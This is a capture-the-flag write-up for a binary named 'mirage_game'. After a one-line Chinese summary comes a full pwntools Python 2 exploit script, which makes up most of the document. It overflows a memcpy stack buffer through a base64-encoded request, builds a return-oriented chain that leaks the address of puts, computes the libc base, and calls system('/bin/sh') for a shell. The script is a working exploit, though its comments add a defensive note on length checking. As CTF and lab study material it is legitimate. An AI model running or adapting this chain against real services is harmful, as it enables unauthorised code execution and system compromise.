By
Lometsj
程序是一个简单的memcpy溢出,需要注意一次base64转换,通过puts泄漏地址计算libc_base,构造system(“/bin/sh”)即可
"""Write-up proof-of-concept for the `mirage_game` CTF binary (pwntools).

Python 2 script: it uses `print` statements, `str` payloads and
`generator.next()`, so it will not run unmodified on Python 3.

Flow, as the surrounding write-up describes it: the service copies a
length-controlled, base64-encoded body with memcpy into a fixed stack
buffer; the payload layout below (0x30 filler + 8 bytes of saved frame
pointer + return address) is what the script assumes about that buffer.
Round 1 leaks the resolved address of `puts` through its GOT entry, the
libc base is derived from the local libc's `puts` offset, and round 2
calls `system("/bin/sh")` with an address computed from that base.

Defensive takeaway: the chain relies on (a) the copy length not being
checked against the destination buffer and (b) a fixed code address
(0x403383), i.e. the binary is presumably not position-independent — TODO
confirm with `checksec`. Bounding the declared length to the buffer size
removes the overflow that everything else here depends on.
"""
from pwn import *
import base64

context.log_level = 'debug'

io = process('./mirage_game')
elf = ELF('./mirage_game')
# Must match the libc the target actually loads; symbol offsets are taken from it.
lib = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# NOTE: neither of these is used below; the leak goes through elf.got['puts'].
write_got = elf.got['write']
read_got = elf.got['read']

# Request header: 4-byte magic 'RPCM' followed by two 4-byte fields.
# The 0x0c field looks like a length (the reply is read as 12 bytes just after)
# — TODO confirm against the protocol parser.
pre = 'RPCM'
pre += '\x00\x00\x00\x0c'
pre += '\x00\x00\x00\x00'
io.send(pre)
io.recv(12)

# Second header with a different last field (0x42); presumably selects the
# request type whose body is base64-decoded and copied — unverified here.
payload = 'RPCM'
payload += '\x00\x00\x00\x0c'
payload += '\x00\x00\x00\x42'
fakeebp = 'b' * 8  # overwrites the saved frame pointer; its value is not used
io.send(payload)

io.recvuntil(':)\n')

# Round 1: overflow, then return into a gadget at 0x403383 that (presumably)
# pops the next stack word into the first-argument register, so puts@plt is
# called with puts@got as its argument and prints the resolved libc address.
# elf.symbols['sfadkjf'] is the address execution returns to afterwards so the
# service survives for round 2.
payload1 = 'a' * 0x30 + fakeebp
payload1 += p64(0x403383) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.symbols['sfadkjf'])
# The service base64-decodes the body before copying it (see write-up).
payload1 = base64.b64encode(payload1)
io.sendline(payload1)
r = io.recv()

# NOTE: the name is misleading — this is the leaked address of puts, not write
# (the print label is correct). Second line of the reply, right-padded to 8 bytes.
write_addr = u64(r.split('\n')[1].ljust(8,'\x00'))
print "puts_addr: " + hex(write_addr)
libc_base = write_addr - lib.symbols['puts']
system_addr = libc_base + lib.symbols['system']

# Round 2: same overflow, same gadget, argument = "/bin/sh" inside libc,
# then return into system().
payload2 = 'a' * 0x30 + fakeebp
print hex(lib.search('/bin/sh').next())  # offset of "/bin/sh" within libc, for the log
payload2 += p64(0x403383) + p64(libc_base + lib.search('/bin/sh').next()) + p64(system_addr)
payload2 = base64.b64encode(payload2)
io.sendline(payload2)
io.interactive()